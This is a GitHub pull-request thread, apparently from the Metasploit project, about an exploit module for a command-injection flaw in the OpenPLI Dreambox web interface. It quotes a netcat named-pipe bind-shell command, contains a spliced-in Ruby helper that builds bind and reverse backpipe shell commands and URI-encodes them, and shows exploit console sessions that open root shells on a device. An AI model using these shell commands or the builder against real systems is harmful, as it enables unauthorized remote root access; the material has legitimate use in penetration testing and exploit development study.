
Openpli #1496

Merged
merged 1 commit into from Mar 14, 2013

Conversation

@m-1-k-3 commented Feb 16, 2013

Hey guys,

attached you will find the module for the openpli web vulnerability.

http://www.s3cur1ty.de/m1adv2013-007

Looking forward to your feedback.

Best,
mIke

@jlee-r7 commented Feb 20, 2013

Overriding the payload is not ok.

@m-1-k-3 commented Feb 20, 2013

Could you explain it to me in a bit more detail?

Thanks

uri = '/cgi-bin/setConfigSettings'

if payl =~ /bind/
cmd = Rex::Text.uri_encode("mknod /tmp/backpipe p; nc -l -p #{lport} 0</tmp/backpipe | /bin/sh 1>/tmp/backpipe")

Don't do this. You're breaking handlers and bypassing encoders.

@m-1-k-3 commented Feb 24, 2013

The device has a netcat binary installed. This netcat binary does not understand the typical -e switch that is used by the Metasploit payloads.

After discussing this issue with Juan offline, it looks like the correct way is to generate a new cmd payload for this module. But for now it is just this one module that will use this payload. @jlee-r7, should we generate a new payload, or is there any better way?

Best,
mIke

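The comment above is the crux of the thread: the target's netcat has no -e, so the payload has to wire nc to /bin/sh through a named pipe instead. The following is an added example, written for this page and not code from the PR, from m-1-k-3's module or from Metasploit's cmd/unix payloads. It builds the same mknod/backpipe command for the bind and reverse cases, lists the binaries each variant needs on the target (the information a module's Compat/RequiredCmd entry conveys), and percent-encodes the result for a GET parameter. The pipe path /tmp/backpipe and a writable /tmp are assumptions taken from the snippet quoted earlier in the thread; in a real module the command string should come from payload.encoded, as jlee-r7 says, not be built inside the exploit.

```ruby
# Added example (not PR or Metasploit code): netcat "backpipe" shells for a
# netcat binary that lacks the -e switch, as on the Dreambox in this thread.
require 'erb'

module NetcatBackpipe
  # Named pipe that carries nc's output into /bin/sh and sh's output back to nc.
  # Assumed path: /tmp is writable on the device in the PR, but that is an
  # assumption of this example.
  PIPE = '/tmp/backpipe'

  def self.check_port(lport)
    port = Integer(lport)
    raise ArgumentError, "bad port #{lport}" unless (1..65535).cover?(port)
    port
  end

  # Bind shell: nc listens on lport; bytes it receives flow out of the pipe into
  # sh's stdin, and sh's stdout is written back into the pipe, which nc sends.
  def self.bind_cmd(lport)
    port = check_port(lport)
    "mknod #{PIPE} p; nc -l -p #{port} 0<#{PIPE} | /bin/sh 1>#{PIPE}"
  end

  # Reverse shell: same wiring, but nc connects out to lhost:lport instead.
  def self.reverse_cmd(lhost, lport)
    port = check_port(lport)
    raise ArgumentError, "bad host #{lhost}" unless lhost =~ /\A[\w.\-:]+\z/
    "mknod #{PIPE} p; nc #{lhost} #{port} 0<#{PIPE} | /bin/sh 1>#{PIPE}"
  end

  # First word of each ';'- or '|'-separated segment: the binaries the command
  # must find on the target (what RequiredCmd expresses in a module's Compat block).
  def self.required_binaries(cmd)
    cmd.split(/[;|]/).map { |seg| seg.strip.split(/\s+/).first }.uniq
  end

  # True when every binary the command calls is in the list of binaries known
  # to exist on the target (the list is constructed by the caller).
  def self.runnable_on?(cmd, available)
    (required_binaries(cmd) - available).empty?
  end

  # Percent-encode for a GET parameter so ';', '|', '<', '>' and spaces survive
  # the HTTP layer. This is transport encoding only, not a Metasploit encoder:
  # it hides nothing from a filter, which is part of why a hard-coded command
  # in the module is weaker than payload.encoded.
  def self.uri_encode(cmd)
    ERB::Util.url_encode(cmd)
  end
end

if __FILE__ == $0
  cmd = NetcatBackpipe.bind_cmd(4444)
  puts cmd
  puts NetcatBackpipe.required_binaries(cmd).inspect
  puts NetcatBackpipe.uri_encode(cmd)
end
```

The pipe is what replaces -e: nc's stdin is the pipe's read end, its stdout is piped into /bin/sh, and sh's stdout is redirected into the pipe's write end, so the socket and the shell are joined without nc ever having to spawn a process itself. The required_binaries check is the same question RequiredCmd answers at module level: this command only works where mknod, nc and /bin/sh all exist.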
@jvazquez-r7

After discussing the topic with @jlee-r7, #1532 tries to modify the cmd payloads to support netcat without the -e option.

@m-1-k-3, do you mind taking a look and sharing your opinion on #1532? Do you think the modified payloads would allow you to use them here?

Regards,

juan

@jvazquez-r7

Hi m-1-k-3, we just merged #1576. Hopefully the new netcat payloads can be used from the Openpli module and we can close it soon!

'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat-e generic'
Hopefully

'RequiredCmd' => 'netcat'

can be used now, after #1576, and the payloads embedded in the module code can be avoided.

Please feel free to update it and update us with anything!

@m-1-k-3 commented Mar 14, 2013

Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/bind_netcat_openbsd
PAYLOAD => cmd/unix/bind_netcat_openbsd
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set RHOST 192.168.178.102
RHOST => 192.168.178.102
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.178.105:44177 -> 192.168.178.102:4444) at 2013-03-14 10:59:06 +0100
id

uid=0(root) gid=0(root)

Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set PAYLOAD cmd/unix/reverse_netcat_openbsd
PAYLOAD => cmd/unix/reverse_netcat_openbsd
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > set LHOST 192.168.178.105
LHOST => 192.168.178.105
Exploiting Demo - 192.168.178.105 / 0 exploit(dreambox_openpli_shell) > exploit

[*] Started reverse handler on 192.168.178.105:4444
[*] Command shell session 2 opened (192.168.178.105:4444 -> 192.168.178.102:1024) at 2013-03-14 10:59:52 +0100
id

uid=0(root) gid=0(root)

@jvazquez-r7

Hi @m-1-k-3,

I've done a PR to your repo: m-1-k-3#3

I've done the final module cleanup myself. Please feel free to review the changes and ask about any doubts regarding them; once you can verify it's working it will be ready to merge. Just land the PR above on your repo and this one will be updated automatically.

I've verified the generated HTTP request and it seems okay, but since I don't have a real device to test on, I'll need your help again!

@jvazquez-r7 jvazquez-r7 merged commit b4554d2 into rapid7:master Mar 14, 2013
@jvazquez-r7

Merged, thanks @m-1-k-3!!
